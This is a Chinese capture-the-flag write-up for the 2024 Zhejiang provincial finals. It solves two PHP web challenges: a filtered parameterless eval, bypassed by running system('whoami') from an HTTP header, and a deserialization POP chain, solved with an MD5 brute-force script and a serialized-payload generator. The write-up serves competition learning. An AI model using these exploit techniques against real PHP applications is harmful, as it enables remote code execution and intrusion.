2024浙江省省赛决赛wp

rce

`<?php   echo "get只接受code欧,flag在上一级目录<br>";   $filename = __FILE__;   highlight_file($filename);   if(isset($_GET['code'])){       if (!preg_match('/session_id\(|readfile\(/i', $_GET['code']))           {           if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) {                   @eval($_GET['code']);               }                 }       else{           die("不让用session欧，readfile也不行");       }   }   ?>`

无参rce过滤了readfile和session_id方法我用的是这个

GET /1.php?code=eval(next(getallheaders())); HTTP/1.1

Host: 172.28.13.107

Priority: u=0, i

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Upgrade-Insecure-Requests: system('whoami');

比赛的时候不知道是不是apache诶这个方法只能是apache的
用get_define_class也行这个通用

unserialize

<?php

# 源码

highlight_file(__FILE__);

error_reporting(0);

class AAA{

    public $aear;

    public $string;

    public function __construct($a){

        $this -> aear = $a;

    }

    function __destruct()

    {

        echo $this -> aear;

    }

    public function __toString()

    {

        $new = $this -> string;

        return $new();

    }

  

}

  

class BBB {

    private $pop;

  

    public function __construct($string) {

        $this -> pop = $string;

    }

  

    public function __get($value) {

        $var = $this -> $value;

        $var[$value]();

    }

}

  

class DDD{

    public $bag;

    public $magazine;

  

    public function __toString()

    {

        $length = @$this -> bag -> add();

        return $length;

    }

    public function __set($arg1,$arg2)

    {

        if($this -> magazine -> tower)

        {

            echo "really??";

        }

    }

}

  

class EEE{

    public $d=array();

    public $e;

    public $f;

    public function __get($arg1){

        $this->d[$this->e]=1;

        if ($this->d[]=1){

            echo 'nononononnnn!!!';

        }

        else{

            eval($this->f);

        }

    }

}

  

class FFF{

    protected $cookie;

  

    protected function delete() {

        return $this -> cookie;

    }

  

    public function __call($func, $args) {

        echo 'hahahhhh';

        call_user_func([$this, $func."haha"], $args);

    }

}

class GGG{

    public $green;

    public $book;

    public function __invoke(){

        if(md5(md5($this -> book)) == 666) {

            return $this -> green -> pen;

        }

    }

}

  

if(isset($_POST['UP'])) {

    unserialize($_POST['UP']);

}

调用链为

AAA::__destruct()->AAA::__toString()->GGG::invoke()->EEE::get()

但是最后一个地方的有一个判断就是

if ($this->d[]=1){

            echo 'nononononnnn!!!';

        }

要让这个判断为false让d为NAN即可我们做个实验

再写个MD5爆破脚本

import hashlib
def crack(pre):
    for i in range(0, 999999):
        a=hashlib.md5(str(i).encode("UTF-8")).hexdigest()
        if(hashlib.md5(str(a).encode("UTF-8")).hexdigest()[0:3])==str(pre):
            print(i)
crack("666")

 <?php
# 源码
highlight_file(__FILE__);
error_reporting(0);
class AAA{
    public $aear;
    public $string;
    public function __construct($a){
        $this -> aear = $a;
    }

}

class BBB {
    private $pop;

    
}

class DDD{
    public $bag;
    public $magazine;

    
}

class EEE{
    public $d=array();
    public $e;
    public $f;
    
}

class FFF{
    protected $cookie;

    
}
class GGG{
    public $green;
    public $book;
    
}

$eee=new EEE();
$eee->d=NAN;
$eee->e=NAN;
$eee->f="system('whoami');";
$ggg=new GGG();
$ggg->green=$eee;
$ggg->book='213';
$aaaa = new AAA();
$aaaa->string = $ggg;
$aaa = new AAA($aaaa);
echo urlencode(serialize($aaa));

![图片](https://img2024.cnblogs.com/blog/3660992/202510/3660992-20251017085509688-2138691162.png)